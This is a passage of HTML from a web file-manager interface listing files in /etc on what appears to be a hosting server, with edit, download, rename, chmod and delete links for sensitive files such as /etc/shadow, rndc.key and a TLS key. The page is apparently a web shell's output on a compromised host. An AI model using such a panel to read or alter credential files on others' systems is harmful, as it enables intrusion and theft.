                                <a href="?download=1&path=%2Fetc%2Fpasswd.nouids.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/passwd.nouids.cache','passwd.nouids.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/passwd.nouids.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/passwd.nouids.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pcp.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpcp.conf" class="file-link">📄 pcp.conf</a></td>
                            <td class="size">7.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-21 00:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpcp.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpcp.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/pcp.conf','pcp.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pcp.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pcp.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="phishing.txt">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fphishing.txt" class="file-link">📄 phishing.txt</a></td>
                            <td class="size">946 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fphishing.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fphishing.txt" class="action-button">Download</a>
                                <button onclick="showRename('/etc/phishing.txt','phishing.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/phishing.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/phishing.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="php_selector.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fphp_selector.conf" class="file-link">📄 php_selector.conf</a></td>
                            <td class="size">2 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fphp_selector.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fphp_selector.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/php_selector.conf','php_selector.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/php_selector.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/php_selector.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pool.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpool.conf" class="file-link">📄 pool.conf</a></td>
                            <td class="size">219 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-07 15:47</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpool.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpool.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/pool.conf','pool.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pool.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pool.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="popbeforesmtp">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpopbeforesmtp" class="file-link">📄 popbeforesmtp</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpopbeforesmtp" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpopbeforesmtp" class="action-button">Download</a>
                                <button onclick="showRename('/etc/popbeforesmtp','popbeforesmtp')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/popbeforesmtp','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/popbeforesmtp',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="printcap">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprintcap" class="file-link">📄 printcap</a></td>
                            <td class="size">233 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprintcap" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fprintcap" class="action-button">Download</a>
                                <button onclick="showRename('/etc/printcap','printcap')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/printcap','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/printcap',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="profile">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprofile" class="file-link">📄 profile</a></td>
                            <td class="size">1.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprofile" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fprofile" class="action-button">Download</a>
                                <button onclick="showRename('/etc/profile','profile')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/profile','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/profile',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="protocols">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprotocols" class="file-link">📄 protocols</a></td>
                            <td class="size">6.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fprotocols" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fprotocols" class="action-button">Download</a>
                                <button onclick="showRename('/etc/protocols','protocols')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/protocols','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/protocols',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pure-ftpd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpure-ftpd.conf" class="file-link">📄 pure-ftpd.conf</a></td>
                            <td class="size">10.8 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-18 03:35</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpure-ftpd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpure-ftpd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/pure-ftpd.conf','pure-ftpd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pure-ftpd.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pure-ftpd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pure-ftpd.pem">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpure-ftpd.pem" class="file-link">📄 pure-ftpd.pem</a></td>
                            <td class="size">8.4 KB</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-05-29 17:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpure-ftpd.pem" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpure-ftpd.pem" class="action-button">Download</a>
                                <button onclick="showRename('/etc/pure-ftpd.pem','pure-ftpd.pem')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pure-ftpd.pem','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pure-ftpd.pem',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rbld.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frbld.conf" class="file-link">📄 rbld.conf</a></td>
                            <td class="size">422 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frbld.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frbld.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rbld.conf','rbld.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rbld.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rbld.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc.local">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frc.local" class="file-link">📄 rc.local</a></td>
                            <td class="size">474 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frc.local" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frc.local" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rc.local','rc.local')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc.local','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc.local',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="recent_authed_mail_ips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_authed_mail_ips" class="file-link">📄 recent_authed_mail_ips</a></td>
                            <td class="size">1018 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_authed_mail_ips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frecent_authed_mail_ips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/recent_authed_mail_ips','recent_authed_mail_ips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/recent_authed_mail_ips','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/recent_authed_mail_ips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="recent_authed_mail_ips_users">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_authed_mail_ips_users" class="file-link">📄 recent_authed_mail_ips_users</a></td>
                            <td class="size">4.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_authed_mail_ips_users" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frecent_authed_mail_ips_users" class="action-button">Download</a>
                                <button onclick="showRename('/etc/recent_authed_mail_ips_users','recent_authed_mail_ips_users')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/recent_authed_mail_ips_users','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/recent_authed_mail_ips_users',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="recent_recipient_mail_server_ips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_recipient_mail_server_ips" class="file-link">📄 recent_recipient_mail_server_ips</a></td>
                            <td class="size">113 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 10:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frecent_recipient_mail_server_ips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frecent_recipient_mail_server_ips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/recent_recipient_mail_server_ips','recent_recipient_mail_server_ips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/recent_recipient_mail_server_ips','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/recent_recipient_mail_server_ips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="redhat-release">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fredhat-release" class="file-link">📄 redhat-release</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fredhat-release" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fredhat-release" class="action-button">Download</a>
                                <button onclick="showRename('/etc/redhat-release','redhat-release')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/redhat-release','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/redhat-release',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="relayhosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frelayhosts" class="file-link">📄 relayhosts</a></td>
                            <td class="size">1018 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frelayhosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frelayhosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/relayhosts','relayhosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/relayhosts','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/relayhosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="relayhostsusers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frelayhostsusers" class="file-link">📄 relayhostsusers</a></td>
                            <td class="size">4.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frelayhostsusers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frelayhostsusers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/relayhostsusers','relayhostsusers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/relayhostsusers','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/relayhostsusers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="remotedomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fremotedomains" class="file-link">📄 remotedomains</a></td>
                            <td class="size">5.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-19 17:41</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fremotedomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fremotedomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/remotedomains','remotedomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/remotedomains','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/remotedomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="request-key.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frequest-key.conf" class="file-link">📄 request-key.conf</a></td>
                            <td class="size">1.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2023-04-05 19:15</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frequest-key.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frequest-key.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/request-key.conf','request-key.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/request-key.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/request-key.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="reservedipreasons">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedipreasons" class="file-link">📄 reservedipreasons</a></td>
                            <td class="size">72 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedipreasons" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Freservedipreasons" class="action-button">Download</a>
                                <button onclick="showRename('/etc/reservedipreasons','reservedipreasons')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/reservedipreasons','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/reservedipreasons',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="reservedipreasons,v">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedipreasons%2Cv" class="file-link">📄 reservedipreasons,v</a></td>
                            <td class="size">716 B</td>
                            <td><span class="permissions">0444</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedipreasons%2Cv" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Freservedipreasons%2Cv" class="action-button">Download</a>
                                <button onclick="showRename('/etc/reservedipreasons,v','reservedipreasons,v')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/reservedipreasons,v','0444')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/reservedipreasons,v',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="reservedips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedips" class="file-link">📄 reservedips</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Freservedips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/reservedips','reservedips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/reservedips','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/reservedips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="reservedips,v">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedips%2Cv" class="file-link">📄 reservedips,v</a></td>
                            <td class="size">808 B</td>
                            <td><span class="permissions">0444</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Freservedips%2Cv" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Freservedips%2Cv" class="action-button">Download</a>
                                <button onclick="showRename('/etc/reservedips,v','reservedips,v')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/reservedips,v','0444')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/reservedips,v',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="resolv.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fresolv.conf" class="file-link">📄 resolv.conf</a></td>
                            <td class="size">163 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-03-23 23:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fresolv.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fresolv.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/resolv.conf','resolv.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/resolv.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/resolv.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rndc.key">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frndc.key" class="file-link">📄 rndc.key</a></td>
                            <td class="size">100 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frndc.key" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frndc.key" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rndc.key','rndc.key')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rndc.key','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rndc.key',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rpc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frpc" class="file-link">📄 rpc</a></td>
                            <td class="size">1.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2021-08-02 01:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frpc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frpc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rpc','rpc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rpc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rpc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rsyncd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyncd.conf" class="file-link">📄 rsyncd.conf</a></td>
                            <td class="size">458 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-16 18:30</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyncd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frsyncd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rsyncd.conf','rsyncd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rsyncd.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rsyncd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rsyslog.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyslog.conf" class="file-link">📄 rsyslog.conf</a></td>
                            <td class="size">3.7 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyslog.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frsyslog.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rsyslog.conf','rsyslog.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rsyslog.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rsyslog.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rsyslog.conf.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyslog.conf.rpmnew" class="file-link">📄 rsyslog.conf.rpmnew</a></td>
                            <td class="size">3.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-14 15:35</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Frsyslog.conf.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Frsyslog.conf.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/rsyslog.conf.rpmnew','rsyslog.conf.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rsyslog.conf.rpmnew','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rsyslog.conf.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="s-nail.rc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fs-nail.rc" class="file-link">📄 s-nail.rc</a></td>
                            <td class="size">9.4 KB</td>
                            <td><span class="permissions">0444</span></td>
                            <td>2025-12-17 11:27</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fs-nail.rc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fs-nail.rc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/s-nail.rc','s-nail.rc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/s-nail.rc','0444')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/s-nail.rc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="screenrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fscreenrc" class="file-link">📄 screenrc</a></td>
                            <td class="size">6.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-01-04 07:53</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fscreenrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fscreenrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/screenrc','screenrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/screenrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/screenrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="secondarymx">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsecondarymx" class="file-link">📄 secondarymx</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsecondarymx" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsecondarymx" class="action-button">Download</a>
                                <button onclick="showRename('/etc/secondarymx','secondarymx')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/secondarymx','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/secondarymx',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="senderverifybypasshosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsenderverifybypasshosts" class="file-link">📄 senderverifybypasshosts</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsenderverifybypasshosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsenderverifybypasshosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/senderverifybypasshosts','senderverifybypasshosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/senderverifybypasshosts','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/senderverifybypasshosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="services">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fservices" class="file-link">📄 services</a></td>
                            <td class="size">676.0 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fservices" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fservices" class="action-button">Download</a>
                                <button onclick="showRename('/etc/services','services')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/services','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/services',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sestatus.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsestatus.conf" class="file-link">📄 sestatus.conf</a></td>
                            <td class="size">216 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-04 23:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fsestatus.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fsestatus.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/sestatus.conf','sestatus.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sestatus.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sestatus.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="shadow">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow" class="file-link">📄 shadow</a></td>
                            <td class="size">54.6 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 10:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fshadow" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fshadow" class="action-button">Download</a>
                                <button onclick="showRename('/etc/shadow','shadow')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/shadow','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/shadow',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="shadow-">
